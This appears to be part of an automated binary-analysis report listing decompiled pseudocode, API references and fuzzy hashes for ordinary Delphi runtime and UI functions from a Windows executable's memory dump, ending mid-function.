                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileMeta$Bits$DeleteHeader
                                  • String ID: `
                                  • API String ID: 1990453761-2679148245
                                  • Opcode ID: afe5ae6a1ebb78d8413ab54d0dc82c03aa184a26d4f5dae321a52fec47e49c4f
                                  • Instruction ID: e3d58840c12eccf8fac65368ef228add472a70bfe160740b652eb308043c6d96
                                  • Opcode Fuzzy Hash: afe5ae6a1ebb78d8413ab54d0dc82c03aa184a26d4f5dae321a52fec47e49c4f
                                  • Instruction Fuzzy Hash: 44411975A00218AFDB00DFA9D885AAEB7F9EF48710F51846AF904E7251E7399D40CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0046E520(void* __eax, void* __ebx, char __ecx, int __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				long _t53;
                                  				long _t68;
                                  				void* _t73;
                                  				intOrPtr _t77;
                                  				void* _t84;
                                  				intOrPtr _t92;
                                  				void* _t95;
                                  				long _t100;
                                  				long _t101;
                                  				int _t103;
                                  				void* _t107;
                                  
                                  				_v40 = 0;
                                  				_v36 = 0;
                                  				_v24 = 0;
                                  				_v8 = __ecx;
                                  				_t103 = __edx;
                                  				_t84 = __eax;
                                  				_push(_t107);
                                  				_push(0x46e68f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t107 + 0xffffffdc;
                                  				if(__edx < 0) {
                                  					L8:
                                  					_pop(_t92);
                                  					 *[fs:eax] = _t92;
                                  					_push(0x46e696);
                                  					E004043FC( &_v40, 2);
                                  					return E004043D8( &_v24);
                                  				}
                                  				_t100 = SendMessageA(E0044D590( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
                                  				_v16 = _t100;
                                  				if(_t100 < 0) {
                                  					_t101 = SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0xbb, _t103 - 1, 0);
                                  					_v16 = _t101;
                                  					if(_t101 < 0) {
                                  						goto L8;
                                  					}
                                  					_t53 = SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0xc1, _v16, 0);
                                  					if(_t53 == 0) {
                                  						goto L8;
                                  					}
                                  					_v16 = _v16 + _t53;
                                  					_v20 = 0x46e6a8;
                                  					L6:
                                  					_v12 = _v16;
                                  					SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0x437, 0,  &_v16);
                                  					_push( &_v24);
                                  					_v32 = _v8;
                                  					_v28 = 0xb;
                                  					_push( &_v32);
                                  					E004045D0( &_v36, _v20);
                                  					_pop(_t95);
                                  					E00409B8C(_v36, 0, _t95);
                                  					_t68 = E00404898(_v24);
                                  					SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0xc2, 0, _t68);
                                  					_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x10)))) + 0xd0))();
                                  					if(_t73 != E00404698(_v24) + _v12) {
                                  						_t77 =  *0x4bad44; // 0x469640
                                  						E0040656C(_t77, 0,  &_v40);
                                  						E0040CAC4(_v40, 1);
                                  						E00403DEC();
                                  					}
                                  					goto L8;
                                  				}
                                  				_v20 = 0x46e6a0;
                                  				goto L6;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: %s$%s
                                  • API String ID: 3850602802-919867895
                                  • Opcode ID: 8d6ba24e1ae8ce66fbe9985369f8be8777de10353d04a59624603d62fda9e7af
                                  • Instruction ID: 6e49c6dbe5183381036b63f531b6c4c870199514b9a82918fec43b96cebc282b
                                  • Opcode Fuzzy Hash: 8d6ba24e1ae8ce66fbe9985369f8be8777de10353d04a59624603d62fda9e7af
                                  • Instruction Fuzzy Hash: D141E275E10209ABDB00EFA6C881B9E77F8EF48704F50457AF915F7281E779AD008B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00424E18(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				intOrPtr* _v12;
                                  				long _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _t22;
                                  				char _t29;
                                  				void* _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr* _t62;
                                  				intOrPtr _t63;
                                  				void* _t72;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  
                                  				_t72 = _t73;
                                  				_t74 = _t73 + 0xffffffec;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t53 = __eax;
                                  				_t22 = GetCurrentThreadId();
                                  				_t62 =  *0x4bb250; // 0x4bc034
                                  				if(_t22 !=  *_t62) {
                                  					_v24 = GetCurrentThreadId();
                                  					_v20 = 0;
                                  					_t55 =  *0x4bb044; // 0x417c50
                                  					E0040CBBC(_t53, _t55, 1, __edi, __esi, 0,  &_v24);
                                  					E00403DEC();
                                  				}
                                  				if(_t53 <= 0) {
                                  					E00424DF0();
                                  				} else {
                                  					E00424DFC(_t53);
                                  				}
                                  				_v16 = 0;
                                  				_push(0x4bc86c);
                                  				L00406AC4();
                                  				_push(_t72);
                                  				_push(0x424fa6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				_v16 = InterlockedExchange(0x4a05d0, _v16);
                                  				_push(_t72);
                                  				_push(0x424f87);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                                  					_t29 = 0;
                                  				} else {
                                  					_t29 = 1;
                                  				}
                                  				_v5 = _t29;
                                  				if(_v5 == 0) {
                                  					L14:
                                  					_pop(_t63);
                                  					 *[fs:eax] = _t63;
                                  					_push(E00424F8E);
                                  					return E0040360C(_v16);
                                  				} else {
                                  					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                  						_v12 = E0041C834(_v16, _t55, 0);
                                  						E0041C710(_v16, _t55, 0);
                                  						L00406C2C();
                                  						 *[fs:eax] = _t74;
                                  						 *[fs:eax] = _t74;
                                  						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], 0x424f22, _t72,  *[fs:eax], 0x424f51, _t72, 0x4bc86c);
                                  						 *[fs:eax] = 0;
                                  						 *[fs:eax] = 0;
                                  						_push(E00424F58);
                                  						_push(0x4bc86c);
                                  						L00406AC4();
                                  						return 0;
                                  					} else {
                                  						goto L14;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 00424E23
                                  • GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 00424E32
                                    • Part of subcall function 00424DF0: ResetEvent.KERNEL32(000000D4,00424E6D,?,?,00000000), ref: 00424DF6
                                  • RtlEnterCriticalSection.KERNEL32(004BC86C,?,?,00000000), ref: 00424E77
                                  • InterlockedExchange.KERNEL32(004A05D0,?), ref: 00424E93
                                  • RtlLeaveCriticalSection.KERNEL32(004BC86C,00000000,00424F87,?,00000000,00424FA6,?,004BC86C,?,?,00000000), ref: 00424EEC
                                  • RtlEnterCriticalSection.KERNEL32(004BC86C,00424F58,00424F87,?,00000000,00424FA6,?,004BC86C,?,?,00000000), ref: 00424F4B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID: P|A
                                  • API String ID: 2189153385-296530014
                                  • Opcode ID: 250e5b096d0595d0af9feda43fec8f2dbf43211fd40725f0698e0d751449f8a4
                                  • Instruction ID: 22ac641c7484cd4b7ae660a6c92a99a3b3625633b4ebdb8e793899e1d6ce66e1
                                  • Opcode Fuzzy Hash: 250e5b096d0595d0af9feda43fec8f2dbf43211fd40725f0698e0d751449f8a4
                                  • Instruction Fuzzy Hash: DD31A330B04214AFE711EF65E892B6DBBF8EBC9704F938476F400E6691D77D9810CA29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00401D0C() {
                                  				void* _v8;
                                  				intOrPtr* _v12;
                                  				void* _t13;
                                  				void* _t15;
                                  				intOrPtr* _t18;
                                  				void* _t31;
                                  				void* _t37;
                                  				intOrPtr _t42;
                                  				void* _t44;
                                  				void* _t46;
                                  				intOrPtr _t47;
                                  
                                  				_t44 = _t46;
                                  				_t47 = _t46 + 0xfffffff8;
                                  				if( *0x4bc5c4 == 0) {
                                  					return _t13;
                                  				} else {
                                  					_push(_t44);
                                  					_push(E00401E00);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t47;
                                  					if( *0x4bc04d != 0) {
                                  						_push(0x4bc5cc);
                                  						L00401414();
                                  					}
                                  					 *0x4bc5c4 = 0;
                                  					_t15 =  *0x4bc624; // 0x262b80
                                  					LocalFree(_t15);
                                  					 *0x4bc624 = 0;
                                  					_t18 =  *0x4bc5ec; // 0x2641b4
                                  					_v12 = _t18;
                                  					while(0x4bc5ec != _v12) {
                                  						VirtualFree( *(_v12 + 8), 0, 0x8000);
                                  						_v12 =  *_v12;
                                  					}
                                  					E004014B0(0x4bc5ec);
                                  					E004014B0(0x4bc5fc);
                                  					E004014B0(0x4bc628);
                                  					_t31 =  *0x4bc5e4; // 0x263b80
                                  					_v8 = _t31;
                                  					while(_v8 != 0) {
                                  						 *0x4bc5e4 =  *_v8;
                                  						LocalFree(_v8);
                                  						_t37 =  *0x4bc5e4; // 0x263b80
                                  						_v8 = _t37;
                                  					}
                                  					_pop(_t42);
                                  					 *[fs:eax] = _t42;
                                  					_push(0x401e07);
                                  					if( *0x4bc04d != 0) {
                                  						_push(0x4bc5cc);
                                  						L0040141C();
                                  					}
                                  					_push(0x4bc5cc);
                                  					L00401424();
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(004BC5CC,00000000,00401E00), ref: 00401D3B
                                  • LocalFree.KERNEL32(00262B80,00000000,00401E00), ref: 00401D4D
                                  • VirtualFree.KERNEL32(?,00000000,00008000,00262B80,00000000,00401E00), ref: 00401D71
                                  • LocalFree.KERNEL32(00000000,?,00000000,00008000,00262B80,00000000,00401E00), ref: 00401DC2
                                  • RtlLeaveCriticalSection.KERNEL32(004BC5CC,00401E07,00262B80,00000000,00401E00), ref: 00401DF0
                                  • RtlDeleteCriticalSection.KERNEL32(004BC5CC,00401E07,00262B80,00000000,00401E00), ref: 00401DFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID: dA&
                                  • API String ID: 3782394904-2347778391
                                  • Opcode ID: 149718dd26ade9965b64e7494a6c201eec5fdfc2ef60a3a15d91dc2c956997d4
                                  • Instruction ID: 14da7ec355c2a494ff4fb7cee85de43d2df91a33603a8c2a7e85bd41da547308
                                  • Opcode Fuzzy Hash: 149718dd26ade9965b64e7494a6c201eec5fdfc2ef60a3a15d91dc2c956997d4
                                  • Instruction Fuzzy Hash: 5D212671A04254AFDB21EBA9D9C5B9A7BE4AB08304F1045BBE540A73F1D638B940DB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004300F4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				struct HMONITOR__* _t27;
                                  				struct tagMONITORINFO* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x4bc930 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						_t29->rcMonitor.left = 0;
                                  						_t29->rcMonitor.top = 0;
                                  						_t29->rcMonitor.right = GetSystemMetrics(0);
                                  						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00406CD4();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					 *0x4bc914 = E0042FDB8(4, _t23, "GetMonitorInfo",  *0x4bc914, _t29);
                                  					_t24 = GetMonitorInfoA(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 00430125
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0043014C
                                  • GetSystemMetrics.USER32 ref: 00430161
                                  • GetSystemMetrics.USER32 ref: 0043016C
                                  • lstrcpy.KERNEL32 ref: 00430196
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  • Opcode ID: a745b0ea275a56c30d6849e1e9f3efcde2940e5ba8f14c191c69aacad631b9f3
                                  • Instruction ID: 2460b0c7709c6b6456444fd34ef3c52d0da8ebf9cf835d26616491e12d2247d4
                                  • Opcode Fuzzy Hash: a745b0ea275a56c30d6849e1e9f3efcde2940e5ba8f14c191c69aacad631b9f3
                                  • Instruction Fuzzy Hash: 2011D3716013146FEB20CF619CC5BA7B7E8EB49750F00563AED4597250D779A9008BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E00438338(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				signed int _v8;
                                  				struct tagSIZE _v16;
                                  				char _v17;
                                  				struct tagRECT _v33;
                                  				struct tagRECT _v49;
                                  				signed int _v61;
                                  				char _v65;
                                  				char _v80;
                                  				char _v84;
                                  				char _v88;
                                  				char _v92;
                                  				char _v96;
                                  				char _v100;
                                  				char _v104;
                                  				int _v108;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				int _t114;
                                  				int _t128;
                                  				int _t133;
                                  				CHAR* _t137;
                                  				int _t147;
                                  				CHAR* _t151;
                                  				signed int _t175;
                                  				signed int _t176;
                                  				void* _t191;
                                  				void* _t206;
                                  				int _t212;
                                  				CHAR* _t216;
                                  				intOrPtr* _t234;
                                  				void* _t235;
                                  				signed int _t249;
                                  				intOrPtr _t254;
                                  				void* _t260;
                                  				void* _t277;
                                  				void* _t281;
                                  				intOrPtr _t286;
                                  				int _t291;
                                  				intOrPtr _t294;
                                  				intOrPtr _t295;
                                  
                                  				_t294 = _t295;
                                  				_t235 = 0x11;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t235 = _t235 - 1;
                                  				} while (_t235 != 0);
                                  				_push(_t235);
                                  				_t234 = __eax;
                                  				_push(_t294);
                                  				_push(0x4386da);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t295;
                                  				_t286 =  *((intOrPtr*)(__eax + 0x208));
                                  				E004293D8(_t286);
                                  				if(E0043373C(E00433634()) == 0) {
                                  					_v8 = E00429334(_t286, 0x4386f0);
                                  					_push( *((intOrPtr*)(_t234 + 0x4c)));
                                  					_push( &_v33);
                                  					_t249 = _v8 >> 1;
                                  					if(__eflags < 0) {
                                  						asm("adc edx, 0x0");
                                  					}
                                  					_t236 =  *((intOrPtr*)(_t234 + 0x48));
                                  					E0041B1E4(0, _t234,  *((intOrPtr*)(_t234 + 0x48)), _t249 - 1);
                                  					__eflags =  *((char*)(_t234 + 0x1a5));
                                  					if(__eflags == 0) {
                                  						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t236, 0xff000006, _t286, _t294, __eflags);
                                  					} else {
                                  						_v33.left = _v33.left + 1;
                                  						_v33.top = _v33.top + 1;
                                  						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t236, 0xff000014, _t286, _t294, __eflags);
                                  						E00429044(_t286,  &_v33);
                                  						OffsetRect( &_v33, 0xffffffff, 0xffffffff);
                                  						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t236, 0xff000010, _t286, _t294, __eflags);
                                  					}
                                  					E00429044(_t286,  &_v33);
                                  					E00446D44(_t234,  &_v108);
                                  					__eflags = _v108;
                                  					if(__eflags != 0) {
                                  						_t114 = E00403814(_t234, __eflags);
                                  						__eflags = _t114;
                                  						if(_t114 != 0) {
                                  							_push(_v8);
                                  							_push( &_v124);
                                  							E00446D44(_t234,  &_v128);
                                  							_push(E00429318( *((intOrPtr*)(_t234 + 0x208)), _v128));
                                  							_pop(_t260);
                                  							_t239 = 0;
                                  							__eflags = 0;
                                  							E0041B1E4(_v33.right - _t260 - 8, _t234, 0, 0);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							_t286 = _t286;
                                  						} else {
                                  							_t239 = 0;
                                  							E0041B1E4(8, _t234, 0, 0,  &_v33, _v8);
                                  						}
                                  						_t291 = E00449070(_t234, 0x20, __eflags);
                                  						_t128 = _t291 | 0x00000400;
                                  						__eflags = _t128;
                                  						E00446D44(_t234,  &_v132);
                                  						_t133 = E00404698(_v132);
                                  						E00446D44(_t234,  &_v136);
                                  						_t137 = E00404898(_v136);
                                  						DrawTextA(E004294DC(_t286), _t137, _t133,  &_v33, _t128);
                                  						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t239,  *((intOrPtr*)(_t234 + 0x70)), _t286, _t294, __eflags);
                                  						E00446D44(_t234,  &_v140);
                                  						_t147 = E00404698(_v140);
                                  						E00446D44(_t234,  &_v144);
                                  						_t151 = E00404898(_v144);
                                  						DrawTextA(E004294DC(_t286), _t151, _t147,  &_v33, _t291);
                                  					}
                                  				} else {
                                  					E00446D44(_t234,  &_v84);
                                  					_t298 = _v84;
                                  					if(_v84 == 0) {
                                  						__eflags = 0;
                                  						E0041B1E4(0, _t234, 0, 0,  &_v49, 0);
                                  					} else {
                                  						E00446D44(_t234,  &_v88);
                                  						_t212 = E00404698(_v88);
                                  						E00446D44(_t234,  &_v92);
                                  						_t216 = E00404898(_v92);
                                  						GetTextExtentPoint32A(E004294DC(_t286), _t216, _t212,  &_v16);
                                  						E0041B1E4(0, _t234, _v16.cx, 0,  &_v49, _v16.cy);
                                  						if(E00403814(_t234, _t298) != 0) {
                                  							OffsetRect( &_v49,  *((intOrPtr*)(_t234 + 0x48)) - 8 - _v49.right, 0);
                                  						} else {
                                  							OffsetRect( &_v49, 8, 0);
                                  						}
                                  					}
                                  					 *((intOrPtr*)( *_t234 + 0x44))();
                                  					_t175 = _v49.bottom - _v49.top;
                                  					_t176 = _t175 >> 1;
                                  					if(_t175 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					_v61 = _t176;
                                  					ExcludeClipRect(E004294DC(_t286), _v49, _v49.top, _v49.right, _v49.bottom);
                                  					if( *((intOrPtr*)( *_t234 + 0x50))() == 0) {
                                  						_v17 = 0x1c;
                                  					} else {
                                  						_v17 = 0x1b;
                                  					}
                                  					E00433634();
                                  					E004339A0( &_v80, _v17);
                                  					_push( &_v65);
                                  					_push(0);
                                  					_push(E004294DC(_t286));
                                  					_t191 = E00433634();
                                  					_pop(_t277);
                                  					E00433848(_t191,  &_v80, _t277);
                                  					SelectClipRgn(E004294DC(_t286), 0);
                                  					E00446D44(_t234,  &_v96);
                                  					if(_v96 != 0) {
                                  						E00446D44(_t234,  &_v104);
                                  						E00404C30( &_v100, _v104);
                                  						_push(_v100);
                                  						_push( &_v49);
                                  						_push(0);
                                  						_push(0);
                                  						_push(E004294DC(_t286));
                                  						_t206 = E00433634();
                                  						_pop(_t281);
                                  						E0043393C(_t206,  &_v80, _t281);
                                  					}
                                  				}
                                  				_pop(_t254);
                                  				 *[fs:eax] = _t254;
                                  				_push(0x4386e1);
                                  				E004043FC( &_v144, 5);
                                  				E004043FC( &_v108, 2);
                                  				E00404AE4( &_v100);
                                  				return E004043FC( &_v96, 4);
                                  			}

                                  APIs
                                  • GetTextExtentPoint32A.GDI32(00000000,00000000,00000000,?), ref: 004383C3
                                  • OffsetRect.USER32 ref: 004383F3
                                  • OffsetRect.USER32 ref: 0043840A
                                  • ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 00438454
                                  • SelectClipRgn.GDI32(00000000,00000000), ref: 004384A4
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$ClipOffset$ExcludeExtentPoint32SelectText
                                  • String ID:
                                  • API String ID: 1219254864-0
                                  • Opcode ID: 3fa42aa6e1e4a03af4bad19e63fd9a07babbc805b5dfbbe7ea6ca7ecef49b8b6
                                  • Instruction ID: 8bdcfce26607efbdf63c460d1e65f0c50f46bdb3397507f324e35a96c536653a
                                  • Opcode Fuzzy Hash: 3fa42aa6e1e4a03af4bad19e63fd9a07babbc805b5dfbbe7ea6ca7ecef49b8b6
                                  • Instruction Fuzzy Hash: D3B14871B002049BDB10FBA9CC82ADEB7B9AF49304F50856BF505EB246DA3CDD45CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404254(void* __ecx) {
                                  				long _v4;
                                  				int _t3;
                                  
                                  				if( *0x4bc04c == 0) {
                                  					if( *0x4a0030 == 0) {
                                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                  					}
                                  					return _t3;
                                  				} else {
                                  					if( *0x4bc220 == 0xd7b2 &&  *0x4bc228 > 0) {
                                  						 *0x4bc238();
                                  					}
                                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                  					return WriteFile(GetStdHandle(0xfffffff5), E004042DC, 2,  &_v4, 0);
                                  				}
                                  			}

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040431E,?,?,00000000,?,00000001,004043CA,00402C17,00402C5F), ref: 0040428D
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00404293
                                  • GetStdHandle.KERNEL32(000000F5,004042DC,00000002,?,00000000,00000000,?,0040431E,?,?,00000000,?,00000001,004043CA,00402C17,00402C5F), ref: 004042A8
                                  • WriteFile.KERNEL32(00000000,000000F5,004042DC,00000002,?), ref: 004042AE
                                  • MessageBoxA.USER32 ref: 004042CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  • Opcode ID: d812b627cafcd32b6163f81e9816f70754a24187308936334d6bcbbb51b05439
                                  • Instruction ID: 8bbea50611fc5059121855c55957be573dc5c1fadd068eb649dbc53dda791323
                                  • Opcode Fuzzy Hash: d812b627cafcd32b6163f81e9816f70754a24187308936334d6bcbbb51b05439
                                  • Instruction Fuzzy Hash: 57F090A1B843007AEA2073D5ACC6F5A36584785B98F6047FFB250B84F2C7FC44C0922E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0048E7C8(signed int* __eax, void* __ecx, void* __edi, void* __esi) {
                                  				signed int* _v8;
                                  				intOrPtr _v12;
                                  				char _v40;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				int _t88;
                                  				signed int _t89;
                                  				signed int _t102;
                                  				signed int* _t103;
                                  				void* _t108;
                                  				signed int _t110;
                                  				signed int _t119;
                                  				signed int _t129;
                                  				signed int _t131;
                                  				void* _t133;
                                  				signed int _t137;
                                  				signed int _t142;
                                  				intOrPtr* _t148;
                                  				intOrPtr* _t153;
                                  				MSG* _t160;
                                  				intOrPtr _t177;
                                  				intOrPtr _t178;
                                  				intOrPtr _t184;
                                  				intOrPtr _t190;
                                  				intOrPtr* _t191;
                                  				intOrPtr _t193;
                                  				intOrPtr* _t194;
                                  				void* _t200;
                                  				void* _t201;
                                  				void* _t203;
                                  				void* _t205;
                                  				intOrPtr _t206;
                                  
                                  				_t201 = __esi;
                                  				_t200 = __edi;
                                  				_t203 = _t205;
                                  				_t206 = _t205 + 0xffffffdc;
                                  				_v8 = __eax;
                                  				_t160 =  &_v40;
                                  				_v12 = 0;
                                  				if(_v8[0xa5] != 0) {
                                  					return _v12;
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 + 0x16c))();
                                  					_push(_t203);
                                  					_push(0x48eaee);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t206;
                                  					do {
                                  						if(PeekMessageA(_t160, 0, 0, 0, 1) == 0) {
                                  							E0048F634(_v8, _t160, _t160, _t200, _t201, __eflags);
                                  						} else {
                                  							if(_t160->message != 0x7b) {
                                  								L5:
                                  								if((_v8[7] & 0x00000010) == 0) {
                                  									L7:
                                  									if(E0048DFBC(_v8, _t160) == 0) {
                                  										_t88 = _t160->message;
                                  										__eflags = _t88 - 0x100;
                                  										if(_t88 >= 0x100) {
                                  											__eflags = _t88 - 0xb402;
                                  											if(__eflags > 0) {
                                  												_t89 = _t88 - 0xb403;
                                  												__eflags = _t89;
                                  												if(_t89 == 0) {
                                  													_v8[0xbd] =  *((intOrPtr*)( *_v8 + 0x150))();
                                  												} else {
                                  													__eflags = _t89 == 1;
                                  													if(_t89 == 1) {
                                  														_v8[0xbd] =  *((intOrPtr*)( *_v8 + 0x154))();
                                  													} else {
                                  														goto L48;
                                  													}
                                  												}
                                  											} else {
                                  												if(__eflags == 0) {
                                  													E0048DC60(_v8, _t160->lParam);
                                  												} else {
                                  													_t102 = _t88 + 0xffffff00 - 9;
